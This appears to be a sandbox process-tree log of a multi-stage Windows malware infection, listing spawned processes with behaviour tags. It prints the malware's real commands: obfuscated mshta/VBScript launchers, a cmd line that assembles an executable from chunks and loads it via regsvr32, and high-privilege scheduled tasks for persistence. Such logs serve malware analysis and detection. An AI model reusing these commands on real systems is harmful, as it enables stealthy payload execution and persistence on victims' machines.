C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\ProgramData\263405.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\ProgramData\263405.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\ProgramData\263405.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\ProgramData\263405.exe") do taskkill -iM "%~nxT" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN (""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )6⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ("C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE") do taskkill -iM "%~nxT" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *" ,0 ,tRUE))6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ &CoPy /b /y StbAQR.mZ +NNIZo8.S+ _7Ijs.BLD + GX3VA2JI.W+ JGSZHKM.HL +XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u &del /Q *7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "8⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s ..\WAvZq~GT.C /u8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "263405.exe" -f5⤵
- Kills process with taskkill
-
C:\ProgramData\4990988.exe"C:\ProgramData\4990988.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\qQbVMM4g0bpXElDCk7u81Gef.exe"C:\Users\Admin\Pictures\Adobe Films\qQbVMM4g0bpXElDCk7u81Gef.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\mXtIGk3ofwNa4d7r1RCLpLFz.exe"C:\Users\Admin\Pictures\Adobe Films\mXtIGk3ofwNa4d7r1RCLpLFz.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\RIIYmTjLPmSKrYWy3rHDnAMz.exe"C:\Users\Admin\Documents\RIIYmTjLPmSKrYWy3rHDnAMz.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\B2zEVweKaLRoMVSBnxG2zIKP.exe"C:\Users\Admin\Pictures\Adobe Films\B2zEVweKaLRoMVSBnxG2zIKP.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\1asWT9_23sWIkWvXBfuAHztv.exe"C:\Users\Admin\Pictures\Adobe Films\1asWT9_23sWIkWvXBfuAHztv.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2365⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Q1pBmzxBvVLfgY90IfmvNLJJ.exe"C:\Users\Admin\Pictures\Adobe Films\Q1pBmzxBvVLfgY90IfmvNLJJ.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\2CBMfkvtUogf9hzCi_qA7oap.exe"C:\Users\Admin\Pictures\Adobe Films\2CBMfkvtUogf9hzCi_qA7oap.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 2805⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F4COS.tmp\Qa0ydjRf2tdAW_WXEvJN1dhr.tmp"C:\Users\Admin\AppData\Local\Temp\is-F4COS.tmp\Qa0ydjRf2tdAW_WXEvJN1dhr.tmp" /SL5="$10408,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-EF1H5.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-EF1H5.tmp\ShareFolder.exe" /S /UID=27096⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\20-856f3-888-eca8c-b90f044df7422\SHeviwihyqa.exe"C:\Users\Admin\AppData\Local\Temp\20-856f3-888-eca8c-b90f044df7422\SHeviwihyqa.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30840 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exeC:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe"C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exeC:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31180 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n4tcryki.du0\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 23610⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exeC:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exeC:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe"C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8664 -s 23610⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mqtobfb1.to5\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GI393.tmp\mSbGRGi7Yiq04OsOdmXbOJGl.tmp"C:\Users\Admin\AppData\Local\Temp\is-GI393.tmp\mSbGRGi7Yiq04OsOdmXbOJGl.tmp" /SL5="$702D6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-AC606.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-AC606.tmp\ShareFolder.exe" /S /UID=27106⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\52-5cd71-928-ef2ba-3df7538a39203\Xushafufubo.exe"C:\Users\Admin\AppData\Local\Temp\52-5cd71-928-ef2ba-3df7538a39203\Xushafufubo.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 23610⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exe /qn CAMPAIGN="654" & exit8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exeC:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exeC:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe"C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9416 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ov0r321b.lqk\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10628 -s 24010⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exeC:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exeC:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe"C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32448 -s 23610⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zczlk0uz.byc\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Ry0sLelmoRd_bMBgDPnNMTnO.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\CmeSFYMVAV502OOB00xIE3du.exe"C:\Users\Admin\Pictures\Adobe Films\CmeSFYMVAV502OOB00xIE3du.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 17405⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe" -u5⤵
-
C:\Users\Admin\Pictures\Adobe Films\s8SU1s3eNIwgJA57Ks5cMfdE.exe"C:\Users\Admin\Pictures\Adobe Films\s8SU1s3eNIwgJA57Ks5cMfdE.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8edc9dec0,0x7ff8edc9ded0,0x7ff8edc9dee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:27⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=1900 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2480 /prefetch:17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2468 /prefetch:17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=2376 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3060 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:27⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3516 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3888 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3880 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3912 /prefetch:87⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\EBU0gvgBJleOPWdQsXtPukc0.exe"C:\Users\Admin\Pictures\Adobe Films\EBU0gvgBJleOPWdQsXtPukc0.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\FvMCEwri6_qByE_3M8DbslRU.exe"C:\Users\Admin\Pictures\Adobe Films\FvMCEwri6_qByE_3M8DbslRU.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\S7koKpK33vLWjAxi5chFkuJ9.exe"C:\Users\Admin\Pictures\Adobe Films\S7koKpK33vLWjAxi5chFkuJ9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\aAXlLwdC9UKnsWc8aTXy3Ptd.exe"C:\Users\Admin\Pictures\Adobe Films\aAXlLwdC9UKnsWc8aTXy3Ptd.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5872 -s 2403⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\nxfL7_6XSgUfDUVDEan06Mbe.exe"C:\Users\Admin\Pictures\Adobe Films\nxfL7_6XSgUfDUVDEan06Mbe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exeSun0397381f1f458e.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exe" -u2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 2402⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
